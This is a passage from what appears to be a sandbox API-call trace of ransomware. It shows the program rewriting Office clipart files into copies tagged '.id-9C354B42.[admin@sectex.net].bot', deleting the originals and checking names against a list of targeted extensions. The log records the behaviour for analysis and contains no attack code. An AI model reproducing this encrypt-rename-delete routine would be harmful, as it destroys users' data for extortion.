	[0147.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.194] GetLastError () returned 0x0
	[0147.194] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x88c, lpOverlapped=0x0) returned 1
	[0147.205] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x890, lpOverlapped=0x0) returned 1
	[0147.206] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.207] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.207] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.207] CloseHandle (hObject=0x3ac) returned 1
	[0147.207] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.207] SetEndOfFile (hFile=0x384) returned 1
	[0147.209] CloseHandle (hObject=0x384) returned 1
	[0147.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf")) returned 1
	[0147.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.210] lstrlenW (lpString=".doc") returned 4
	[0147.210] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.210] lstrlenW (lpString=".docx") returned 5
	[0147.210] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.210] lstrlenW (lpString=".pdf") returned 4
	[0147.210] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.210] lstrlenW (lpString=".xls") returned 4
	[0147.210] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.210] lstrlenW (lpString=".xlsx") returned 5
	[0147.210] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.210] lstrlenW (lpString=".ppt") returned 4
	[0147.210] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.210] lstrlenW (lpString=".zip") returned 4
	[0147.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.210] lstrlenW (lpString=".rar") returned 4
	[0147.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.210] lstrlenW (lpString=".bz2") returned 4
	[0147.210] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString=".7z") returned 3
	[0147.211] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.211] lstrlenW (lpString=".dbf") returned 4
	[0147.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.211] lstrlenW (lpString=".1cd") returned 4
	[0147.211] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.211] lstrlenW (lpString=".jpg") returned 4
	[0147.211] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.211] lstrlenW (lpString=".doc") returned 4
	[0147.211] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString=".docx") returned 5
	[0147.211] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.211] lstrlenW (lpString=".pdf") returned 4
	[0147.211] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString=".xls") returned 4
	[0147.211] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.211] lstrlenW (lpString=".xlsx") returned 5
	[0147.211] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.211] lstrlenW (lpString=".ppt") returned 4
	[0147.211] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.211] lstrlenW (lpString=".zip") returned 4
	[0147.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.211] lstrlenW (lpString=".rar") returned 4
	[0147.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.211] lstrlenW (lpString=".bz2") returned 4
	[0147.212] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.212] lstrlenW (lpString=".7z") returned 3
	[0147.212] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.212] lstrlenW (lpString=".dbf") returned 4
	[0147.212] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.212] lstrlenW (lpString=".1cd") returned 4
	[0147.212] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63
	[0147.212] lstrlenW (lpString=".jpg") returned 4
	[0147.212] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.212] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.213] lstrlenW (lpString="FD02088_.WMF") returned 12
	[0147.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.213] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3696) returned 1
	[0147.213] CloseHandle (hObject=0x384) returned 1
	[0147.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf")) returned 0x20
	[0147.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.214] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.214] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.214] GetLastError () returned 0x0
	[0147.214] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xe70, lpOverlapped=0x0) returned 1
	[0147.224] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xe80, lpOverlapped=0x0) returned 1
	[0147.225] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.225] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.225] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.225] CloseHandle (hObject=0x3ac) returned 1
	[0147.226] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.226] SetEndOfFile (hFile=0x384) returned 1
	[0147.228] CloseHandle (hObject=0x384) returned 1
	[0147.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.229] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf")) returned 1
	[0147.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.229] lstrlenW (lpString=".doc") returned 4
	[0147.229] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.229] lstrlenW (lpString=".docx") returned 5
	[0147.229] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.229] lstrlenW (lpString=".pdf") returned 4
	[0147.229] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.229] lstrlenW (lpString=".xls") returned 4
	[0147.229] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.230] lstrlenW (lpString=".xlsx") returned 5
	[0147.230] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.230] lstrlenW (lpString=".ppt") returned 4
	[0147.230] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.230] lstrlenW (lpString=".zip") returned 4
	[0147.230] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.230] lstrlenW (lpString=".rar") returned 4
	[0147.230] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString=".bz2") returned 4
	[0147.230] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString=".7z") returned 3
	[0147.230] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.230] lstrlenW (lpString=".dbf") returned 4
	[0147.230] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.230] lstrlenW (lpString=".1cd") returned 4
	[0147.230] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.230] lstrlenW (lpString=".jpg") returned 4
	[0147.230] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.230] lstrlenW (lpString=".doc") returned 4
	[0147.230] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.230] lstrlenW (lpString=".docx") returned 5
	[0147.230] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.230] lstrlenW (lpString=".pdf") returned 4
	[0147.230] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.231] lstrlenW (lpString=".xls") returned 4
	[0147.231] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.231] lstrlenW (lpString=".xlsx") returned 5
	[0147.231] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.231] lstrlenW (lpString=".ppt") returned 4
	[0147.231] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.231] lstrlenW (lpString=".zip") returned 4
	[0147.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.231] lstrlenW (lpString=".rar") returned 4
	[0147.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.231] lstrlenW (lpString=".bz2") returned 4
	[0147.231] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.231] lstrlenW (lpString=".7z") returned 3
	[0147.231] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.231] lstrlenW (lpString=".dbf") returned 4
	[0147.231] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.231] lstrlenW (lpString=".1cd") returned 4
	[0147.231] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 63
	[0147.231] lstrlenW (lpString=".jpg") returned 4
	[0147.231] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.231] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.231] lstrlenW (lpString="FD02115_.WMF") returned 12
	[0147.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.234] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4660) returned 1
	[0147.234] CloseHandle (hObject=0x3ac) returned 1
	[0147.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf")) returned 0x20
	[0147.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.234] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.235] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.235] GetLastError () returned 0x0
	[0147.235] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1234, lpOverlapped=0x0) returned 1
	[0147.248] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1240, lpOverlapped=0x0) returned 1
	[0147.249] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.249] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.249] SetEndOfFile (hFile=0x3a0) returned 1
	[0147.249] CloseHandle (hObject=0x3a0) returned 1
	[0147.249] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.249] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.251] CloseHandle (hObject=0x3ac) returned 1
	[0147.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.252] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf")) returned 1
	[0147.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.252] lstrlenW (lpString=".doc") returned 4
	[0147.252] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.252] lstrlenW (lpString=".docx") returned 5
	[0147.252] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.252] lstrlenW (lpString=".pdf") returned 4
	[0147.252] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.252] lstrlenW (lpString=".xls") returned 4
	[0147.252] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.252] lstrlenW (lpString=".xlsx") returned 5
	[0147.252] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.252] lstrlenW (lpString=".ppt") returned 4
	[0147.252] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.252] lstrlenW (lpString=".zip") returned 4
	[0147.252] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.252] lstrlenW (lpString=".rar") returned 4
	[0147.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString=".bz2") returned 4
	[0147.253] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString=".7z") returned 3
	[0147.253] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.253] lstrlenW (lpString=".dbf") returned 4
	[0147.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.253] lstrlenW (lpString=".1cd") returned 4
	[0147.253] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.253] lstrlenW (lpString=".jpg") returned 4
	[0147.253] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.253] lstrlenW (lpString=".doc") returned 4
	[0147.253] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString=".docx") returned 5
	[0147.253] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.253] lstrlenW (lpString=".pdf") returned 4
	[0147.253] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString=".xls") returned 4
	[0147.253] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.253] lstrlenW (lpString=".xlsx") returned 5
	[0147.253] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.253] lstrlenW (lpString=".ppt") returned 4
	[0147.253] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.253] lstrlenW (lpString=".zip") returned 4
	[0147.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.254] lstrlenW (lpString=".rar") returned 4
	[0147.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.254] lstrlenW (lpString=".bz2") returned 4
	[0147.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.254] lstrlenW (lpString=".7z") returned 3
	[0147.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.254] lstrlenW (lpString=".dbf") returned 4
	[0147.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.254] lstrlenW (lpString=".1cd") returned 4
	[0147.254] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 63
	[0147.254] lstrlenW (lpString=".jpg") returned 4
	[0147.254] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.254] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.254] lstrlenW (lpString="FD02141_.WMF") returned 12
	[0147.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.255] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2636) returned 1
	[0147.255] CloseHandle (hObject=0x3ac) returned 1
	[0147.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf")) returned 0x20
	[0147.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.255] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.412] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
